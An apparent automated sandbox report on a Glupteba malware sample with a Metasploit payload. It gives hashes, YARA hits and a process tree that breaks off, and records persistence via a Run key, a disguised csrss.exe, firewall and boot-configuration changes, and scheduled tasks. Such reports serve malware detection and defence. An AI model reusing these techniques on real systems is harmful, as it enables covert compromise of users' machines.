Analysis
-
max time kernel
159s -
max time network
167s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
29-01-2023 18:31
Static task
static1
Behavioral task
behavioral1
Sample
e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe
Resource
win10v2004-20221111-en
General
-
Target
e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe
-
Size
3.9MB
-
MD5
4f22f6d197f336b668b31e2470c2c857
-
SHA1
c96ebad60609561a1fc8f6e8dc78612b39145110
-
SHA256
e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88
-
SHA512
616c93a8f0b254c624c53fbe1c1f984e79e5c71ecc05a52c8003410317411bb2d49fe8cfc0bb3680a3707ceaf65ddacf0a452334a32fa195b773f8deeb057970
-
SSDEEP
98304:UBw7WMYDTw7yg83ISWR8Ku4TBzFEO6aVSi3GHm7Z:U20+7S1Ku4TBVSiB7Z
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba payload 8 IoCs
Processes:
resource yara_rule behavioral2/memory/2484-133-0x00000000013B0000-0x0000000001BB4000-memory.dmp family_glupteba behavioral2/memory/2484-134-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral2/memory/2484-135-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral2/memory/2484-137-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral2/memory/4012-139-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral2/memory/4012-146-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral2/memory/1336-147-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba behavioral2/memory/1336-153-0x0000000000400000-0x0000000000C1E000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid process target process PID 1444 created 2484 1444 svchost.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe PID 1444 created 1336 1444 svchost.exe csrss.exe PID 1444 created 1336 1444 svchost.exe csrss.exe PID 1444 created 1336 1444 svchost.exe csrss.exe -
Executes dropped EXE 2 IoCs
Processes:
csrss.exepatch.exepid process 1336 csrss.exe 3208 patch.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MistyHill = "\"C:\\Windows\\rss\\csrss.exe\"" e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 3492 bcdedit.exe -
Drops file in Windows directory 2 IoCs
Processes:
e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exedescription ioc process File opened for modification C:\Windows\rss e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe File created C:\Windows\rss\csrss.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe -
Program crash 61 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2152 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4620 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 880 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 1636 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 3820 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 2032 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 1080 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4388 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 2348 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 5032 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 3304 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 3764 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 3848 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4644 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4856 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4252 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 3192 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 1884 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4604 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4756 2484 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 3152 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4672 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4416 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 3020 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 2852 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4340 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 3692 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 3472 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 5076 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 672 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 2308 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 2536 4012 WerFault.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4880 1336 WerFault.exe csrss.exe 1748 1336 WerFault.exe csrss.exe 3828 1336 WerFault.exe csrss.exe 712 1336 WerFault.exe csrss.exe 4448 1336 WerFault.exe csrss.exe 2164 1336 WerFault.exe csrss.exe 3964 1336 WerFault.exe csrss.exe 4444 1336 WerFault.exe csrss.exe 4172 1336 WerFault.exe csrss.exe 4616 1336 WerFault.exe csrss.exe 2056 1336 WerFault.exe csrss.exe 1380 1336 WerFault.exe csrss.exe 1304 1336 WerFault.exe csrss.exe 4948 1336 WerFault.exe csrss.exe 2412 1336 WerFault.exe csrss.exe 4456 1336 WerFault.exe csrss.exe 4828 1336 WerFault.exe csrss.exe 548 1336 WerFault.exe csrss.exe 3640 1336 WerFault.exe csrss.exe 5036 1336 WerFault.exe csrss.exe 2036 1336 WerFault.exe csrss.exe 3216 1336 WerFault.exe csrss.exe 3956 1336 WerFault.exe csrss.exe 1552 1336 WerFault.exe csrss.exe 3932 1336 WerFault.exe csrss.exe 220 1336 WerFault.exe csrss.exe 4648 1336 WerFault.exe csrss.exe 5032 1336 WerFault.exe csrss.exe 4900 1336 WerFault.exe csrss.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1172 schtasks.exe 4584 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust csrss.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exee4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.execsrss.exepid process 2484 e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 2484 e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4012 e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 4012 e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe 1336 csrss.exe 1336 csrss.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exesvchost.execsrss.exedescription pid process Token: SeDebugPrivilege 2484 e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe Token: SeImpersonatePrivilege 2484 e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe Token: SeTcbPrivilege 1444 svchost.exe Token: SeTcbPrivilege 1444 svchost.exe Token: SeBackupPrivilege 1444 svchost.exe Token: SeRestorePrivilege 1444 svchost.exe Token: SeBackupPrivilege 1444 svchost.exe Token: SeRestorePrivilege 1444 svchost.exe Token: SeBackupPrivilege 1444 svchost.exe Token: SeRestorePrivilege 1444 svchost.exe Token: SeBackupPrivilege 1444 svchost.exe Token: SeRestorePrivilege 1444 svchost.exe Token: SeSystemEnvironmentPrivilege 1336 csrss.exe Token: SeBackupPrivilege 1444 svchost.exe Token: SeRestorePrivilege 1444 svchost.exe Token: SeBackupPrivilege 1444 svchost.exe Token: SeRestorePrivilege 1444 svchost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
svchost.exee4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.execmd.execsrss.exedescription pid process target process PID 1444 wrote to memory of 4012 1444 svchost.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe PID 1444 wrote to memory of 4012 1444 svchost.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe PID 1444 wrote to memory of 4012 1444 svchost.exe e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe PID 4012 wrote to memory of 2700 4012 e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe cmd.exe PID 4012 wrote to memory of 2700 4012 e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe cmd.exe PID 2700 wrote to memory of 1268 2700 cmd.exe netsh.exe PID 2700 wrote to memory of 1268 2700 cmd.exe netsh.exe PID 4012 wrote to memory of 1336 4012 e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe csrss.exe PID 4012 wrote to memory of 1336 4012 e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe csrss.exe PID 4012 wrote to memory of 1336 4012 e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe csrss.exe PID 1444 wrote to memory of 1172 1444 svchost.exe schtasks.exe PID 1444 wrote to memory of 1172 1444 svchost.exe schtasks.exe PID 1444 wrote to memory of 4584 1444 svchost.exe schtasks.exe PID 1444 wrote to memory of 4584 1444 svchost.exe schtasks.exe PID 1444 wrote to memory of 3208 1444 svchost.exe patch.exe PID 1444 wrote to memory of 3208 1444 svchost.exe patch.exe PID 1336 wrote to memory of 3492 1336 csrss.exe bcdedit.exe PID 1336 wrote to memory of 3492 1336 csrss.exe bcdedit.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe"C:\Users\Admin\AppData\Local\Temp\e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 3322⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 3362⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 3522⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 5962⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 6962⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 7202⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 7202⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 7522⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 7642⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 6842⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 7842⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 8562⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 7402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 9082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 8402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 9962⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 9482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 8522⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 7242⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe"C:\Users\Admin\AppData\Local\Temp\e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 2963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 3003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 3003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 6243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 6243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 6243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 7083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 6243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 7323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 7483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 6683⤵
- Program crash
-
